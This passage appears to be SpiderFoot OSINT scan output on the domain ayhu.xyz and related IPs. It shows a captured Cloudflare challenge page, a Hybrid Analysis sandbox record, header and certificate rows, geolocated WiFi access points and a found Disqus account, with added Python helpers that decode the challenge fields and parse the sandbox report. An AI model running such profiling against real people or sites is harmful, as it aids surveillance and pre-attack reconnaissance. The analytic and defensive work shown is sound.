WAG4K79Bs3Vtk5_YaWGKevDuxwe2PI4tgDIlPhm0aaMmefu_Aqbmk6Nh3efYd6tebEuF1GGAbp894vPoKIV_oMOG4605Orlbta-mL3BdBLdomEjXGBNzJc8zOt_diWLDMArzlhmqHj68HR17Jaa_r6ERT_jArQXozZtM_B3L5O8SpcafOJWm3x_EH-cSS-ttAlAlAFa0wgnswXzQF8jvtcMH7wOU4U6LjP8DMTOtT18J0nltl0j_q-DNG4lBHonjmIjyRSP8oBxk-3z89_7YNTov0awtqgzLFZw2_mSARwNl4_HaPezvCevT53qGnFReXcG3RzOMm4zSBZbENl_DwydIdBN0QqU0z3ekKIj0DHHzeDbwvLRQiV0Lv01I4DZBYzgAdCYmkN3aWrG0sAU92LemS02Ukd_enHt1XRhTQOnUlyr42CJb5OOWo8CjNFcGn16guPRfUma268s38K2-wnhjS9iCXiymmGF-AAdAizqUKdabbQOSsatJ602VLlNMiwTbinDbOME_fkBdTGzKnt5g_beyji9YWF9g5kjIdThtdFTLZ7VtxqQe64uUOYy3ZMXGyBjPj32wUf-c45ZB1IslXSI3TZ3dwmgQZ-iw9MFsb5EQblUq7mhT6th">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13393',
cRay: '7c5f8c594cb34339',
cHash: '405751743fca02b',
cUPMDTk: "\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2MS4zMjkwMDA=',
m: 'wei6RtcHCTh5k6jXLRR9uxE1j0nSB1DRW6i/4ZVDPwA=',
i1: 'b4n+etCkfjlnsH7ziL0wjQ==',
i2: 'jFCNa6uhaxi0l2WjI6PNAA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c594cb34339');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c594cb34339';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
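The "Web Content Language" row above did not capture ayhu.xyz content at all: the body is Cloudflare's managed-challenge interstitial ("Just a moment..."), so the language finding describes the challenge page, not the site. The challenge script still records the original request in `window._cf_chl_opt.cRq` as base64 fields (`ru` URL, `ra` User-Agent, `rm` method, `t` timestamp), and the `__cf_chl_tk` token embeds the same Unix time. The decoder below is an added example, not part of the scan output or of SpiderFoot; the function names are mine, and its input is a copy of the challenge object from the row above with the opaque `d` blob and hash fields left out.

```python
"""Decode the request that Cloudflare's managed challenge page records in
window._cf_chl_opt.cRq, so a scan row whose body is the 'Just a moment...'
interstitial can still tell you what was requested, how, and when."""
import base64
import re
from datetime import datetime, timezone

# Copied from the challenge page in the row above; the opaque `d` blob and the
# hash fields are left out because they are not needed for this.
CHALLENGE_JS = """
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cRay: '7c5f8c594cb34339',
cUPMDTk: "\\/lol.html?__cf_chl_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
t: 'MTY4Mzg2MTg2MS4zMjkwMDA=',
}
};
"""

# Markers that distinguish the interstitial from the zone's real content.
CHALLENGE_MARKERS = ("window._cf_chl_opt", "/cdn-cgi/challenge-platform/",
                     "<title>Just a moment...</title>")

# key: 'value' pairs on their own line, as the challenge script lays them out
_KV = re.compile(r"^\s*(\w+):\s*'([^']*)'", re.M)
_TOKEN_TS = re.compile(r"__cf_chl_(?:f_|rt_)?tk=[^\"'&]*?-(\d{10})-")

# cRq fields that are base64 of plain text; the others (m, i1, i2, zh, uh, hh)
# are base64 of binary hashes and are not decoded here.
_TEXT_FIELDS = {"ru": "url", "ra": "user_agent", "rm": "method", "t": "timestamp"}


def is_cf_challenge(html):
    """Cheap check that a fetched body is the interstitial, not site content."""
    return any(marker in html for marker in CHALLENGE_MARKERS)


def token_timestamp(js):
    """Unix time embedded in the __cf_chl_tk challenge token, or None."""
    m = _TOKEN_TS.search(js)
    return int(m.group(1)) if m else None


def decode_challenge(js):
    """Zone, ray id, challenge type and the decoded original request."""
    fields = dict(_KV.findall(js))   # keys of cRq and the outer object do not collide
    request = {}
    for key, name in _TEXT_FIELDS.items():
        if key in fields:
            request[name] = base64.b64decode(fields[key]).decode("utf-8")
    if "timestamp" in request:
        when = datetime.fromtimestamp(float(request["timestamp"]), tz=timezone.utc)
        request["time_utc"] = when.strftime("%Y-%m-%d %H:%M:%S")
    return {"zone": fields.get("cZone"), "ray": fields.get("cRay"),
            "type": fields.get("cType"), "request": request}


if __name__ == "__main__":
    if is_cf_challenge(CHALLENGE_JS):
        info = decode_challenge(CHALLENGE_JS)
        print(info["request"]["method"], info["request"]["url"], info["request"]["time_utc"])
        print("UA:", info["request"]["user_agent"])
        print("token time:", token_timestamp(CHALLENGE_JS))
```

On this row the decoded request is `GET https://ayhu.xyz/lol.html` at 2023-05-12 03:24:21 UTC with a Firefox 62 / Windows 10 User-Agent, which is the identity the scanner presented, not anything about the target. Gating a scanner's content modules on `is_cf_challenge` avoids recording the interstitial as the site's language, headers or text.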
| 2023-05-12 02:44:24 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.109.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:01:E3:56:FE:F7) | 52.3759, 4.8975 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Disqus (Category: social)<br>https://disqus.com/by/ayhu/ | ayhu |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5d3adbfbad871d-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | art_vacation5.0 (Net ID: 00:01:9F:30:06:7C) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:48:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 24, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://ihealthlabs.us4.list-manage.com/track/click?u=c8c5e66c560454c0a498d1a07&id=612aad4294&e=9a90f4a41f', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "bcrypt.dll" - [base:fe4e0000; Status:c0000003]\n "msedge.exe" failed to load missing module "d3d11.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "%WINDIR%\\system32\\hevcdecoder.dll" - [base:0; Status:c0000135]\n "msedge.exe" failed to load missing module "d3d12.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4280:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:3720:120:WilError_01"\n "Local\\SM0:3720:304:WilStaging_02"\n "Local\\SM0:3720:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:4280:304:WilStaging_02"\n "SM0:4280:304:WilStaging_02"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4280:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4280:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4280:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"23.227.38.65:443"\n "23.227.60.200:443"\n "34.160.129.82:443"\n "172.66.43.55:443"\n "69.16.175.42:443"\n "52.92.249.169:443"\n "104.17.25.14:443"\n "157.240.22.25:443"\n "185.146.173.20:443"\n "142.251.214.130:443"\n "142.251.32.34:443"\n "172.64.131.28:443"\n "13.227.74.57:443"\n "34.96.102.137:443"\n "142.250.72.206:443"\n "13.227.74.106:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.qikify.com"\n "api.revy.io"\n "api.userway.org"\n "bff-api.automizely.com"\n "bundle.revy.io"\n "cdn.jsdelivr.net"\n "cdn.pagefly.io"\n "cdn.shopify.com"\n "cdn.userway.org"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "connect.facebook.net"\n "d1639lhkj5l89m.cloudfront.net"\n "dev.visualwebsiteoptimizer.com"\n "downloads.mailchimp.com"\n "dttrk.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "fonts.shopifycdn.com"\n "googleads.g.doubleclick.net"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, 
u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<meta name="twitter:site" content="@ihealthlabsus">" (Indicator: "twitter")\n "<meta name="twitter:card" content="summary_large_image">" (Indicator: "twitter")\n "<meta name="twitter:title" content="iHealth COVID-19 Antigen Rapid Test">" (Indicator: "twitter")\n "<meta name="twitter:description" content="iHealth is making personal healthcare management easier for everyone! Improve your health by tracking your vitals data: blood pressure\n blood glucose\n blood oxygen & pulse rate\n and more. Remote Patient Monitoring empowers providers to offer comprehensive care for patients. Increase patient satisfaction\n gain ROI.">" (Indicator: "twitter")\n "<script>window.ShopifyPaypalV4VisibilityTracking = true;</script>" (Indicator: "paypal")\n ""https:\\/\\/twitter.com\\/ihealthlabsus"," (Indicator: "twitter")\n ""https:\\/\\/www.facebook.com\\/iHealthus\\/"," (Indicator: "facebook.com")\n "<a class="social-icons__link" href="https://www.facebook.com/iHealthus/" aria-describedby="a11y-external-message"><svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-facebook" viewBox="0 0 20 20"><path fill="#444" d="M18.05.811q.439 0 .744.305t.305.744v16.637q0 .439-.305.744t-.744.305h-4.732v-7.221h2.415l.342-2.854h-2.757v-1.83q0-.659.293-1t1.073-.342h1.488V3.762q-.976-.098-2.171-.098-1.634 0-2.635.964t-1 2.72V9.47H7.951v2.854h2.415v7.221H1.413q-.439 0-.744-.305t-.305-.744V1.859q0-.439.305-.744T1.413.81H18.05z"/></svg><span class="icon__fallback-text">Facebook</span>" (Indicator: "facebook.com")\n "<a class="social-icons__link" href="https://twitter.com/ihealthlabsus" aria-describedby="a11y-external-message"><svg aria-hidden="true" focusable="false" role="presentation" class="icon icon-twitter" viewBox="0 0 20 20"><path fill="#444" d="M19.551 4.208q-.815 1.202-1.956 2.038 0 .082.02.255t.02.255q0 1.589-.469 3.179t-1.426 3.036-2.272 2.567-3.158 1.793-3.963.672q-3.301 
0-6.031-1.773.571.041.937.041 2.751 0 4.911-1.671-1.284-.02-2.292-.784T2.456 11.85q.346.082.754.082.55 0 1.039-.163-1.365-.285-2.262-1.365T1.09 7.918v-.041q.774.408 1.773.448-.795-.53-1.263-1.396t-.469-1.864q0-1.019.509-1.997 1.487 1.854 3.596 2.924T9.81 7.184q-.143-.509-.143-.897 0-1.63 1.161-2.781t2.832-1.151q.815 0 1.569.326t1.284.917q1.345-.265 2.506-.958-.428 1.386-1.732 2.18 1.243-.163 2.262-.611z"/></svg><span class="icon__fallback-text">Twitter</span>" (Indicator: "twitter")\n "<a class="social-icons__link" href="https://www.linkedin.com/company/ihealth-lab/about/" aria-describedby="a11y-external-message">" (Indicator: "linkedin.com")\n "www.facebook.com" (Indicator: "facebook.com")\n "www.youtube.com" (Indicator: "youtube")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004280]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_2]- [targetUID: 00000000-00004280]\n "Ruleset Data" has type "data"- 
Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.45\\Ruleset Data]- [targetUID: 00000000-00004280]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4280_1753251559\\Filtering Rules]- [targetUID: 00000000-00004280]\n "0f196ca9-49bd-4f3c-a446-6670b2f350fc.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 270742"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00004280]\n "0ba2ec1e-18bb-4a7d-80cb-d06eae98d168.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 2264512"- [targetUID: N/A]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00004280]\n "000013.ldb" has type "data"- [targetUID: N/A]\n "f_0004de" has type "data"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00004280]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db]- [targetUID: 00000000-00004280]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\4280_1753251559\\Filtering Rules-AA]- [targetUID: 00000000-00004280]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "urlref_httpsihealthlabs.us4.list-manage.comtrackclicku_c8c5e66c560454c0a498d1a07_id_612aad4294_e_9a90f4a41f" has type "HTML document UTF-8 Unicode text with very long lines with CRLF CR LF line terminators"- [targetUID: N/A]\n "edge_autofill_field_data.json" has type "JSON data"- Location: [%TEMP%\\4280_1931108865\\edge_autofill_field_data.json]- [targetUID: 00000000-00004280]'}, {u'category': u'Network 
Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdn.pagefly.io" seems to be random\n "cdn.shopify. | 185.199.110.153 |
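Both "Raw Data from RIRs / Hybrid Analysis" rows in this table (the one for 35.229.48.116 earlier and the one for 185.199.110.153 just above) are sandbox reports stored as a Python 2 style repr with `u''` strings rather than JSON, and each was attached to the scanned IP only because the report's "Contacts server" signature lists that address. In the 35.229.48.116 case the submitted sample was a lor.instructure.com URL, every signature is `informative` (threat_level 0), and the only non-trivial indicators are the threat_score of 35 and an extracted reurl.cc URL marked suspicious. The parser below is an added example, not part of SpiderFoot or Hybrid Analysis; the function names are mine, and its input is a trimmed copy of the 35.229.48.116 record with long descriptions cut to what the functions use. It can be pointed at the 185.199.110.153 record the same way.

```python
"""Parse a Hybrid Analysis record as SpiderFoot stores it (a Python-2 style
repr with u'' strings, not JSON) and explain why the report was attached to a
given IP: which contacted endpoints sit on that address, what was submitted,
and which ATT&CK techniques the signatures carry."""
import ast
import re

# Trimmed copy of the record from the 35.229.48.116 row. Long descriptions are
# cut to what the functions below use; ast.literal_eval accepts the u'' prefix
# and None, so no JSON conversion is needed.
HA_RECORD = r"""[{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://reurl.cc/4xdkky', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 35, u'environment_id': 100, u'submit_name': u'https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id': None, u'threat_level_human': u'informative', u'threat_level': 0, u'description': u'"54.82.57.202:443"\n "54.231.160.113:443"\n "35.229.48.116:443"\n "104.16.123.175:443"\n "34.196.48.118:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id': u'T1071.001', u'threat_level_human': u'informative', u'threat_level': 0, u'description': u'(request strings omitted)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id': u'T1071.004', u'threat_level_human': u'informative', u'threat_level': 0, u'description': u'"lor.instructure.com"'}]}]"""

_ENDPOINT = re.compile(r'"(\d{1,3}(?:\.\d{1,3}){3}:\d+)"')
_DOMAIN = re.compile(r'"([A-Za-z0-9.-]+\.[A-Za-z]{2,})"')


def load_ha_records(text):
    """The cell holds a list of reports; return it as Python objects."""
    records = ast.literal_eval(text)
    return records if isinstance(records, list) else [records]


def _descriptions(report, signature_name):
    for sig in report.get("signatures", []):
        if sig.get("name") == signature_name:
            yield sig.get("description", "")


def contacted_endpoints(report):
    """ip:port strings from every 'Contacts server' signature in the report."""
    found = []
    for desc in _descriptions(report, "Contacts server"):
        found.extend(_ENDPOINT.findall(desc))
    return found


def queried_domains(report):
    found = []
    for desc in _descriptions(report, "Queries DNS server"):
        found.extend(_DOMAIN.findall(desc))
    return found


def attack_ids(report):
    return sorted({s["attck_id"] for s in report.get("signatures", []) if s.get("attck_id")})


def explain_pivot(report, ip):
    """Summarise why this sandbox report is relevant to `ip` (if at all)."""
    endpoints = contacted_endpoints(report)
    hits = [ep for ep in endpoints if ep.rsplit(":", 1)[0] == ip]
    ai = report.get("crowdstrike_ai") or {}
    return {
        "submit_name": report.get("submit_name"),
        "threat_score": report.get("threat_score"),
        "matching_endpoints": hits,
        "other_endpoints": len(endpoints) - len(hits),
        "queried_domains": queried_domains(report),
        "attack_ids": attack_ids(report),
        "related_urls": [(u.get("url"), u.get("verdict")) for u in ai.get("analysis_related_urls", [])],
        # every signature on this row is 'informative' (threat_level 0); surface any that are not
        "non_informative_signatures": [s["name"] for s in report.get("signatures", []) if s.get("threat_level", 0) > 0],
    }


if __name__ == "__main__":
    for report in load_ha_records(HA_RECORD):
        for key, value in explain_pivot(report, "35.229.48.116").items():
            print(f"{key}: {value}")
```

The useful output is `matching_endpoints`, which shows the report touches the pivot IP on one of five HTTPS endpoints contacted by an unrelated sample, and `non_informative_signatures`, which is empty here. Read together with the Pulsedive "Open TCP Port 35.229.48.116:80" row, that is weak evidence about the IP itself, and the scan's own data does not support treating it as malicious.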
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-fastly-request-id: 4232179a2468cad7d8e788f0a4fe958396bfc091 | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | malsup.github.io | 185.199.111.153 |
| 2023-05-12 02:47:42 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 35.229.48.116:80 | 35.229.48.116 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:f9:3b:c0:6f:f8:ab:e7:35:d5:ff:95:55:28:
87:2c:f3:42:5c:6a:f2:dc:b2:0f:7b:b2:97:bc:68:
c2:d8:25:b1:da:3c:de:c9:ee:4a:54:a6:08:c9:a0:
d5:34:39:c8:96:b7:d1:e3:5d:f3:2b:db:f7:37:5d:
57:65:f7:3d:16:c9:ad:d6:e6:bb:bc:97:c6:1c:bc:
c7:1d:a0:c9:cc:3a:d4:e1:69:37:d2:58:c2:fe:42:
4e:90:a6:4c:72:5e:0f:c5:0a:f9:18:b1:c7:54:af:
b4:03:13:bc:ce:85:b6:0d:a5:99:fc:98:b2:37:24:
39:66:7b:f1:78:3b:4b:9e:51:be:75:ad:a6:19:8d:
be:a9:ca:f2:df:b7:73:9f:c6:14:09:e1:46:c4:93:
a4:45:7c:eb:1e:47:42:88:d1:8d:e7:29:c0:07:7b:
ad:57:d3:0b:cf:a1:a1:bc:65:12:20:8e:92:81:50:
55:40:69:4e:0d:62:29:ab:00:e6:81:6e:83:3a:16:
09:da:2a:57:32:b1:5d:79:74:f0:1d:02:e0:52:6d:
d5:85:2d:cb:f6:ef:5e:8f:03:a0:14:64:19:bb:71:
65:85:3e:bc:4e:e8:75:85:4b:a0:7d:df:3f:2a:67:
46:82:ea:56:e3:e5:01:c8:49:e2:f1:a3:b1:04:af:
98:45:24:1b:7e:2d:57:39:72:ff:5a:94:89:31:42:
ae:19:e5:2d:eb:c8:08:fc:be:37:02:5d:04:1a:b3:
f0:62:42:14:91:38:7a:96:77:5e:53:eb:f1:d9:8e:
45:46:0d:65:07:6b:18:0a:65:96:3c:4e:b9:77:05:
52:b4:4d:17:73:72:d9:49:c8:16:75:9c:84:35:12:
73:86:4f:08:27:5d:f3:e9:85:10:9a:ff:e4:3a:63:
ef:83:9f:03:76:a4:3f:ac:72:d5:f4:bb:3a:60:bc:
21:1c:e8:7c:52:79:bd:fe:19:9a:69:78:22:a6:5d:
64:8d:04:55:f3:ec:4d:6c:47:45:2c:6c:9e:cc:14:
be:67:76:25:be:fd:51:60:a1:2e:10:af:1b:46:0c:
e9:ec:3a:3c:0b:c9:2a:97:61:1c:a8:6a:9d:53:cd:
2d:6c:4e:66:f4:08:01:29:89:61:ff:d2:73:d2:a1:
da:94:32:dc:5c:78:ad:19:fa:b3:fb:26:0f:35:c2:
87:17:c9:ae:6f:c7:ce:81:d6:7d:27:95:3b:49:39:
e6:cf:30:85:95:79:a1:35:71:86:5b:66:f7:9d:ae:
96:d5:9a:1d:e3:e0:76:fe:b7:a0:b5:1a:16:0b:1b:
5e:d4:d9:5b:b6:4a:4d:33:65:03:80:b9:ab:69:35:
1b:42:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
13:c5:42:8e:df:cd:70:e8:7c:0e:70:c9:5a:83:25:16:cc:62:
c3:f9:d5:c4:22:3b:ce:7f:81:fd:60:05:88:21:1a:e5:70:1c:
36:22:ce:db:ed:26:19:e2:1b:04:4d:ab:65:39:6d:00:51:3b:
cc:9b:3f:79:54:95:3e:31:af:d8:e6:03:1b:cc:d5:95:be:82:
cd:0b:e5:96:8f:6f:35:dd:91:c9:94:47:2b:3a:45:e8:d6:90:
9a:f6:27:ba:63:ff:75:94:72:de:3e:47:3f:d3:d4:41:71:e3:
3f:56:35:21:79:53:05:d2:4b:7c:f6:49:cf:40:3d:7f:f2:f4:
